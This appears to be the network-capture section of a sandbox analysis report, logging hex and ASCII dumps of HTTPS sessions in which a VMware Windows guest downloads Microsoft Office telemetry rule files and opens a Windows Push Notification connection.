2024-11-13 19:39:24 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49726	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:24 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:24 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:24 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 8a8ac7e4-f01e-0020-50a8-34956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193924Z-1749fc9bdbdjjp8thC1DFWye6g00000001gg0000000017x6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:24 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49725	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:24 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:24 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:24 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193924Z-16547b76f7fdtmzhhC1DFW6zhc00000006dg00000000pa1f x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:24 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	49729	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 70 79 37 73 5a 52 46 48 6b 71 47 68 6a 32 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 30 36 39 38 66 33 35 34 63 62 39 64 34 61 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: Opy7sZRFHkqGhj26.1Context: 20698f354cb9d4a8
2024-11-13 19:39:25 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-13 19:39:25 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 70 79 37 73 5a 52 46 48 6b 71 47 68 6a 32 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 30 36 39 38 66 33 35 34 63 62 39 64 34 61 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 44 41 46 67 32 4e 6c 74 7a 37 71 76 6d 39 30 2b 79 79 77 72 36 4d 4c 35 48 6a 54 67 34 50 70 45 64 39 52 56 37 45 75 39 66 50 61 57 36 6b 6b 58 55 38 76 4c 59 75 59 33 68 4f 6b 56 34 63 4f 70 33 38 53 39 75 71 5a 43 54 67 49 65 2f 30 54 34 69 42 51 62 42 6b 4f 41 58 69 67 63 71 67 59 79 4c 75 76 39 4c 76 63 68 42 2b 78 2f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Opy7sZRFHkqGhj26.2Context: 20698f354cb9d4a8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZDAFg2Nltz7qvm90+yywr6ML5HjTg4PpEd9RV7Eu9fPaW6kkXU8vLYuY3hOkV4cOp38S9uqZCTgIe/0T4iBQbBkOAXigcqgYyLuv9LvchB+x/
2024-11-13 19:39:25 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 70 79 37 73 5a 52 46 48 6b 71 47 68 6a 32 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 30 36 39 38 66 33 35 34 63 62 39 64 34 61 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: Opy7sZRFHkqGhj26.3Context: 20698f354cb9d4a8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-13 19:39:25 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-13 19:39:25 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 59 57 74 69 43 6c 36 4b 46 45 43 6d 57 33 54 2f 71 59 7a 37 62 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: YWtiCl6KFECmW3T/qYz7bA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49731	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 9d8ed93b-d01e-00a1-36a7-3435b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-1749fc9bdbdns7kfhC1DFWb6c400000001g000000000n8r4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:25 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49730	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-16547b76f7f22sh5hC1DFWyb4w0000000hgg00000000d87e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:25 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49732	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: ad5ef595-c01e-0082-42a3-34af72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-r178fb8d7655k45rhC1DFWpsgg00000001gg000000001q53 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:25 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49733	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 6d3b9569-701e-0001-03a2-34b110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-r178fb8d765pnpzfhC1DFWgn8s00000001hg00000000kas2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:25 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49734	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: c99285c5-401e-0047-1d71-358597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-r178fb8d7657w5c5hC1DFW5ngg00000001ng000000005xuk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:25 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49735	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:26 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 933b6e18-c01e-0079-6ca0-34e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-1749fc9bdbd85qw2hC1DFW157000000001mg000000009q30 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:26 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49736	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:25 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:26 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:25 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: bf72ccbe-301e-001f-25a0-34aa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193925Z-r178fb8d765w8fzdhC1DFW8ep400000001c000000000kca4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:26 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49738	13.107.246.45	443

